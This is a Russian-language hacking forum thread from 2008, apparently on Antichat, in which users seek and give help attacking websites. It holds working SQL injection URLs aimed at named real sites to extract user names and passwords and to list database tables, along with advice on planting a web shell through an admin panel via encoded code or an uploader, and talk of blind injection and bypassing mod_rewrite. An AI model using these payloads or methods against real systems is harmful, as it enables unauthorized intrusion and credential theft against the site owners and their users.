12.08.2008, 23:05
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Проблема такая - есть админка, есть возможность редактирования страниц ( в т.ч. вставка произвольного пхп кода, который выполнится ) ( все страницы в виде site.com/kkk.php?id=x ) , но вставив код веб-шелла в одну из страниц и перейдя по ней я увидел вместо шелла какие-то каракули =/ Что можно сделать чтобы получить веб-шелл ?
Евал шелл имеется
|
|
|
12.08.2008, 23:18
|
|
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
С нами:
9583330
Репутация:
189
|
|
0nep@t0p, попробуй вставить зашифрованный код.. или как вариант - код простенького аплоадера, а через него ( если он выполнится ) заливай шел.. но если каракули там скорее всего MIME type не для выполнения стоит
|
|
|
|
14.08.2008, 02:41
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Доброго времени суток всем.
Поможите пожалуйста столкнулся с проблемой при вводе корректной sql-инъекции(где имена полей угаданы после суточного ручного перебора) сайт выдаёт свою дефолтную страницу, пример:
_http://www.tarmatrade.ee/index.php?cat=-1+union+select+1,concat_ws(0x3a,nimi,parool)+from+ tarma_kasutajad+limit+0,1/*
для наглядности зделаем ошибку в поле с именем nimi, заменим на name
_http://www.tarmatrade.ee/index.php?cat=-9999+union+select+1,concat_ws(0x3a,name,parool)+fr om+tarma_kasutajad+limit+0,1/*
и картина уже совершенно иная.
Как всё же обойти эту защиту и прочитать результат запроса. (пробовал через Navisckope, но то ли руки кривые, то ли...)
|
|
|
|
15.08.2008, 07:59
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
2zjuk@ полей для вывода нет выход только слепая иньекция )
|
|
|
|
15.08.2008, 14:02
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
2zjuk@ полей для вывода нет выход только слепая иньекция )
Это печально =(((
|
|
|
|
16.08.2008, 15:41
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
ТОварисчи есть ли методы обхода mod-rewrite,а то скуль нашел.Гуглил.
|
|
|
|
16.08.2008, 16:44
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
С нами:
10356158
Репутация:
16
|
|
сегодня гуляя по сайте наткнулся на такое...
Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151
интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
|
|
|
|
16.08.2008, 16:49
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Taylorith
сегодня гуляя по сайте наткнулся на такое...
Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151
интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
>> Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Нету доступа к мускулю. Это не уязвимость.
|
|
|
|
16.08.2008, 17:04
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
С нами:
10356158
Репутация:
16
|
|
ясн спасибо
|
|
|
|
17.08.2008, 01:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables--
какие мысли ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
